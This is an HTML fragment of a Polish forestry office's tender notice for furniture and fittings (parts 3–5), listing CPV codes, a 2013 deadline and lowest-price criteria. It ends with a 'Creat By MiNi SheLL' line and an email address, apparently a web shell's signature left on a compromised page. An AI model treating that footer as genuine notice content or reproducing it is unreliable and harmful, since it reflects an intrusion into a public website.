<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i montaż mebli hotelowych i wyposażenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz wyposażenia budynku administracyjno-biurowego wraz ze wszystkimi kosztami do siedziby Nadleśnictwa Oleszyce, przez co należy rozumieć dostawę z ustawieniem, montażem, podłączeniem i sprawdzeniem całego przedmiotu umowy oraz uporządkowanie pomieszczeń po zrealizowaniu zamówienia. Zamówienie obejmuje meble hotelowe wraz z wyposażeniem.

Szczegółowe wymagania dotyczące przedmiotu zamówienia określa: Specyfikacja techniczna na dostawę i montaż mebli oraz Projekt aranżacji wnętrz budynku administracyjno-biurowego stanowiące załącznik do niniejszej specyfikacji.


Zamawiający wymaga 24-miesięcznej gwarancji na wykonany przedmiot zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.30.00-6, 39.11.21.00-1, 39.14.31.21-0, 39.14.31.10-0, 39.14.33.10-2, 39.14.40.00-3, 32.32.46.00-6, 44.11.58.11-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa i montaż mebli na wymiar oraz kuchennego sprzętu AGD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz wyposażenia budynku administracyjno-biurowego wraz ze wszystkimi kosztami do siedziby Nadleśnictwa Oleszyce, przez co należy rozumieć dostawę z ustawieniem, montażem, podłączeniem i sprawdzeniem całego przedmiotu umowy oraz uporządkowanie pomieszczeń po zrealizowaniu zamówienia. Zamówienie obejmuje meble na wymiar oraz kuchenny sprzęt AGD.

Szczegółowe wymagania dotyczące przedmiotu zamówienia określa: Specyfikacja techniczna na dostawę i montaż mebli oraz Projekt aranżacji wnętrz budynku administracyjno-biurowego stanowiące załącznik do niniejszej specyfikacji.


Zamawiający wymaga 24-miesięcznej gwarancji na wykonany przedmiot zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.14.32.00-8, 39.71.31.00-4, 39.71.14.20-9, 39.71.13.62-4, 39.71.13.61-7, 39.71.11.10-3, 44.41.13.00-7, 39.15.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Elementy wyposażenia wnętrz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz wyposażenia budynku administracyjno-biurowego wraz ze wszystkimi kosztami do siedziby Nadleśnictwa Oleszyce, przez co należy rozumieć dostawę z ustawieniem, montażem, podłączeniem i sprawdzeniem całego przedmiotu umowy oraz uporządkowanie pomieszczeń po zrealizowaniu zamówienia. Zamówienie obejmuje elementy wyposażenia wnętrz.

Szczegółowe wymagania dotyczące przedmiotu zamówienia określa: Specyfikacja techniczna na dostawę i montaż mebli oraz Projekt aranżacji wnętrz budynku administracyjno-biurowego stanowiące załącznik do niniejszej specyfikacji.


Zamawiający wymaga 24-miesięcznej gwarancji na wykonany przedmiot zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.10.00-5, 39.22.43.40-3, 39.29.83.00-0, 30.23.13.00-0, 39.29.81.00-8, 39.13.60.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com